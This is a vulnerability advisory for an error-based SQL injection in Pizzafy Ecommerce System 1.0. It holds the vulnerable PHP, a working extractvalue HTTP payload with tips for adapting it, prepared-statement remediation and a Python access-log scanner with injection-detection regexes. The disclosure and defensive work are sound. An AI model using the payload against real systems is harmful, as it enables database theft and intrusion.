# Vulnerability Summary: SQL Injection Vulnerability in Pizzafy Ecommerce System

## Vulnerability Overview

* **Affected Version**: Pizzafy Ecommerce System 1.0
* **Vulnerability Type**: SQL Injection (Error-based)
* **Severity**: HIGH
* **Status**: Unpatched
* **Vulnerable Endpoint**: `/pizzafy/view_prod.php?id=3`
* **Description**: An error-based SQL injection vulnerability exists in the product `select` functionality of `view_prod.php`. The `id` parameter is read from the query string and interpolated directly into the `WHERE id = ...` clause without validation or parameterization, and the raw database error is echoed back to the client. An attacker can therefore inject SQL into the backend query and read query results out of the returned error message.

## Impact Scope

* **Confidentiality**: Full disclosure of database schema and user credentials.
* **Integrity**: Unauthorized deletion or modification of records.
* **Availability**: Denial of service caused by large-scale data deletion.
* **Privilege Escalation**: Session hijacking and administrative access via extraction of session data.

## Proof of Concept (PoC)

**Vulnerable Code:**

```php
// Untrusted input is concatenated straight into the SQL string ...
$id = $_GET['id'];
$query = $conn->query("SELECT * FROM product_list WHERE id = '$id'");

// ... and the raw MySQL error text is returned to the client, which is
// what makes the error-based extraction below possible.
if (!$query) {
    echo $conn->error;
    exit;
}
```

**Exploit Payload:**

`extractvalue()` is handed an XPath expression built from a subquery result (prefixed with `0x7e`, a `~`, to make it invalid XPath). MySQL includes that expression in its error message, so the first table name of the current schema is returned in the error the page echoes.

```http
GET /pizzafy/view_prod.php?id=9%20AND%20extractvalue(1,concat(0x7e,(SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=database()%20LIMIT%200,1)))%20-- HTTP/1.1
Host: localhost
sec-ch-ua:
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/pizzafy/index.php?page=home
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: __cfduid=d20b0de5062bc2723e98fba4b5ebec739eceeff8d585d86cb304bf6d87ec; PHPSESSID=...
Connection: close
```

Note that the vulnerable query wraps the value in single quotes, so against the code shown above the injected `AND` must be preceded by a closing quote (`id=9'%20AND%20...`), and MySQL only treats a trailing `--` as a comment when it is followed by whitespace.

## Remediation

**Remediation Code:**

```php
// $conn is the existing mysqli connection used by the vulnerable code.
try {
    // Accept only a positive integer; anything else is rejected before it
    // reaches the database.
    $id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
    if ($id === false || $id === null || $id <= 0) {
        throw new Exception("Invalid product ID.");
    }

    // Prepared statement: the value is bound as a parameter, never
    // interpolated into the SQL text.
    $stmt = $conn->prepare("SELECT * FROM product_list WHERE id = ?");
    if (!$stmt) {
        throw new Exception("Error.");
    }
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $result = $stmt->get_result();
    if ($result && $result->num_rows > 0) {
        $prod = $result->fetch_assoc();
    } else {
        throw new Exception("Product not found.");
    }
} catch (Exception $e) {
    // Log the detail server-side; the client only ever sees one of the
    // fixed messages above, never $conn->error.
    error_log("Error: " . $e->getMessage() . " - ID: " . $id);
    echo $e->getMessage();
    exit;
}
```

**Mitigation Recommendations:**

1. **Use Prepared Statements**: Employ parameterized queries so that user input is never part of the SQL text.
2. **Input Validation**: Validate the `id` parameter and accept only the expected form (a positive integer).
3. **Database Permissions**: Restrict the application's database user to the privileges it needs, so a successful injection cannot read `information_schema` beyond its own tables or delete data.
4. **Monitoring and Logging**: Track and alert on anomalous patterns, such as non-numeric `id` values, repeated database errors from one client, or queries touching `information_schema`.
5. **Security Testing**: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities.
6. **Error Handling**: Do not return database error text in responses; it is exactly what error-based injection relies on.
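The validation rule in recommendation 2 and the monitoring in recommendation 4 can be checked together from the web server's access log. The following Python script is an added example, not part of the advisory or of the Pizzafy code base: it applies the same positive-integer rule the fixed endpoint enforces to the `id` values of `view_prod.php` requests and flags values carrying MySQL error-based injection markers such as `extractvalue(` or `information_schema`. The log lines, client addresses and timestamps are constructed, and the log format is assumed to be the Apache/nginx combined format.

```python
"""Added example (not from the advisory): screen access-log lines for SQL
injection attempts against the `id` parameter of /pizzafy/view_prod.php."""
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: client ip, two '-' fields, [timestamp], "request line".
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)"')

# Markers of error-based / schema-enumeration injection against MySQL.
INJECTION_RE = re.compile(
    r"\bextractvalue\s*\(|\bupdatexml\s*\(|\binformation_schema\b|"
    r"\bunion\b[\s\S]*\bselect\b|\b(?:or|and)\b|--|#|/\*|'",
    re.IGNORECASE,
)


def is_valid_product_id(value):
    """The rule the fixed endpoint enforces: a positive integer and nothing else."""
    return re.fullmatch(r"[1-9][0-9]*", value) is not None


def classify_request(request_line):
    """Classify one request line such as 'GET /pizzafy/view_prod.php?id=3 HTTP/1.1'.

    Returns (verdict, decoded id); verdict is 'ignore', 'ok', 'invalid' or 'injection'.
    """
    parts = request_line.split()
    if len(parts) < 2:
        return ("ignore", None)
    url = urlsplit(parts[1])
    if not url.path.endswith("/view_prod.php"):
        return ("ignore", None)
    # parse_qs percent-decodes, so we inspect the value PHP's $_GET would see.
    ids = parse_qs(url.query, keep_blank_values=True).get("id")
    if not ids:
        return ("invalid", "")
    value = ids[0]
    if is_valid_product_id(value):
        return ("ok", value)
    if INJECTION_RE.search(value):
        return ("injection", value)
    return ("invalid", value)


def scan_access_log(lines):
    """Return (ip, verdict, id) for every request that is not a clean product lookup."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict, value = classify_request(m.group("request"))
        if verdict in ("invalid", "injection"):
            findings.append((m.group("ip"), verdict, value))
    return findings


# Constructed sample log; the third line carries the advisory's extractvalue payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /pizzafy/index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /pizzafy/view_prod.php?id=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /pizzafy/view_prod.php?id=9%20AND%20extractvalue(1,concat(0x7e,(SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=database()%20LIMIT%200,1)))%20-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /pizzafy/view_prod.php?id=9%27 HTTP/1.1" 200 480 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /pizzafy/view_prod.php?id=abc HTTP/1.1" 200 480 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, verdict, value in scan_access_log(SAMPLE_LOG):
        print(f"{verdict:9} {ip:14} id={value!r}")
```

Anything that fails the positive-integer rule is reported, so a value that evades the marker regex still surfaces as `invalid`; the `injection` verdict only adds priority. Run over a real log, the `198.51.100.7` pattern of a bare `'` probe followed by an `extractvalue` request is the sequence to alert on.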